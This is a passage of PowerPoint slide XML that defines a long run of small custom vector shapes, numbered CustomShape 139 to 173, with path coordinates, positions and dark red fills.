              <a:path w="35" h="61">
                <a:moveTo>
                  <a:pt x="35" y="35"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="3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1" name="CustomShape 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784760" y="5318280"/>
            <a:ext cx="26640" cy="66240"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17" h="42">
                <a:moveTo>
                  <a:pt x="17" y="14"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="1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2" name="CustomShape 140"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4989600" y="5624640"/>
            <a:ext cx="17280" cy="69480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11" h="44">
                <a:moveTo>
                  <a:pt x="11" y="13"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="13"/>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3" name="CustomShape 141"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4930920" y="5567400"/>
            <a:ext cx="55080" cy="102960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35" h="65">
                <a:moveTo>
                  <a:pt x="35" y="35"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="3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4" name="CustomShape 142"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873680" y="5506920"/>
            <a:ext cx="55080" cy="102960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35" h="65">
                <a:moveTo>
                  <a:pt x="35" y="37"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="37"/>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5" name="CustomShape 143"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4815000" y="5450040"/>
            <a:ext cx="53640" cy="99720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34" h="63">
                <a:moveTo>
                  <a:pt x="34" y="35"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="35"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="200000"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="CustomShape 144"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784760" y="5423040"/>
            <a:ext cx="26640" cy="69480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17" h="44">
                <a:moveTo>
                  <a:pt x="17" y="16"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="16"/>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7" name="CustomShape 145"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784760" y="5472000"/>
            <a:ext cx="45720" cy="87120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="29" h="55">
                <a:moveTo>
                  <a:pt x="29" y="30"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="30"/>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8" name="CustomShape 146"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4944960" y="5635800"/>
            <a:ext cx="61560" cy="112320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="39" h="71">
                <a:moveTo>
                  <a:pt x="39" y="43"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="39" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39" y="43"/>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59" name="CustomShape 147"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4890960" y="5580000"/>
            <a:ext cx="50400" cy="101160"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32" h="64">
                <a:moveTo>
                  <a:pt x="32" y="34"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="3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0" name="CustomShape 148"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834080" y="5522760"/>
            <a:ext cx="53640" cy="97920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34" h="62">
                <a:moveTo>
                  <a:pt x="34" y="34"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="3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1" name="CustomShape 149"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784760" y="4862520"/>
            <a:ext cx="47160" cy="69480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="30" h="44">
                <a:moveTo>
                  <a:pt x="30" y="17"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="30" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="17"/>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2" name="CustomShape 150"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4892760" y="4923000"/>
            <a:ext cx="52200" cy="78840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33" h="50">
                <a:moveTo>
                  <a:pt x="33" y="19"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="19"/>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3" name="CustomShape 151"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4835520" y="4889520"/>
            <a:ext cx="53640" cy="77400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34" h="49">
                <a:moveTo>
                  <a:pt x="34" y="21"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="2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4" name="CustomShape 152"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784760" y="4962600"/>
            <a:ext cx="47160" cy="75960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="30" h="48">
                <a:moveTo>
                  <a:pt x="30" y="21"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="30" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="2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5" name="CustomShape 153"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4946760" y="5070600"/>
            <a:ext cx="61560" cy="88560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="39" h="56">
                <a:moveTo>
                  <a:pt x="39" y="25"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="39" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39" y="2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6" name="CustomShape 154"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4892760" y="5035680"/>
            <a:ext cx="52200" cy="80640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33" h="51">
                <a:moveTo>
                  <a:pt x="33" y="21"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="21"/>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7" name="CustomShape 155"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4835520" y="4997520"/>
            <a:ext cx="53640" cy="78840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34" h="50">
                <a:moveTo>
                  <a:pt x="34" y="22"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="22"/>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8" name="CustomShape 156"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784760" y="5064120"/>
            <a:ext cx="47160" cy="77400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="30" h="49">
                <a:moveTo>
                  <a:pt x="30" y="24"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="30" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="2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69" name="CustomShape 157"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4892760" y="5143680"/>
            <a:ext cx="52200" cy="85320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33" h="54">
                <a:moveTo>
                  <a:pt x="33" y="24"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="2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0" name="CustomShape 158"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4835520" y="5102280"/>
            <a:ext cx="53640" cy="83880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34" h="53">
                <a:moveTo>
                  <a:pt x="34" y="25"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="2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1" name="CustomShape 159"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784760" y="5167440"/>
            <a:ext cx="45720" cy="78840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="29" h="50">
                <a:moveTo>
                  <a:pt x="29" y="23"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="23"/>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2" name="CustomShape 160"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4944960" y="5294160"/>
            <a:ext cx="63000" cy="99720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="40" h="63">
                <a:moveTo>
                  <a:pt x="40" y="33"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="40" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="33"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="400000"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="CustomShape 161"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4890960" y="5251320"/>
            <a:ext cx="50400" cy="91800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32" h="58">
                <a:moveTo>
                  <a:pt x="32" y="26"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="26"/>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4" name="CustomShape 162"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834080" y="5205240"/>
            <a:ext cx="53640" cy="88560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34" h="56">
                <a:moveTo>
                  <a:pt x="34" y="28"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="28"/>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75" name="CustomShape 163"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784760" y="5268960"/>
            <a:ext cx="45720" cy="80640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="29" h="51">
                <a:moveTo>
                  <a:pt x="29" y="24"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="2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6" name="CustomShape 164"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4944960" y="5410080"/>
            <a:ext cx="63000" cy="101160"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="40" h="64">
                <a:moveTo>
                  <a:pt x="40" y="35"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="40" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="35"/>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7" name="CustomShape 165"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4890960" y="5361120"/>
            <a:ext cx="50400" cy="95040"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32" h="60">
                <a:moveTo>
                  <a:pt x="32" y="29"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="29"/>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78" name="CustomShape 166"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834080" y="5308560"/>
            <a:ext cx="53640" cy="95040"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34" h="60">
                <a:moveTo>
                  <a:pt x="34" y="32"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="32"/>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79" name="CustomShape 167"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784760" y="5369040"/>
            <a:ext cx="45720" cy="88560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="29" h="56">
                <a:moveTo>
                  <a:pt x="29" y="29"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="29"/>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0" name="CustomShape 168"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4944960" y="5522760"/>
            <a:ext cx="63000" cy="110880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="40" h="70">
                <a:moveTo>
                  <a:pt x="40" y="38"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="40" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="3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1" name="CustomShape 169"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4890960" y="5472000"/>
            <a:ext cx="50400" cy="97920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32" h="62">
                <a:moveTo>
                  <a:pt x="32" y="31"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="31"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="600000"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="CustomShape 170"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834080" y="5416560"/>
            <a:ext cx="53640" cy="97920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34" h="62">
                <a:moveTo>
                  <a:pt x="34" y="34"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="34"/>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3" name="CustomShape 171"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4946760" y="4954680"/>
            <a:ext cx="60120" cy="85320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="38" h="54">
                <a:moveTo>
                  <a:pt x="38" y="23"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="23"/>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4" name="CustomShape 172"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4989600" y="5038560"/>
            <a:ext cx="18720" cy="60120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12" h="38">
                <a:moveTo>
                  <a:pt x="12" y="8"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="8"/>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5" name="CustomShape 173"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
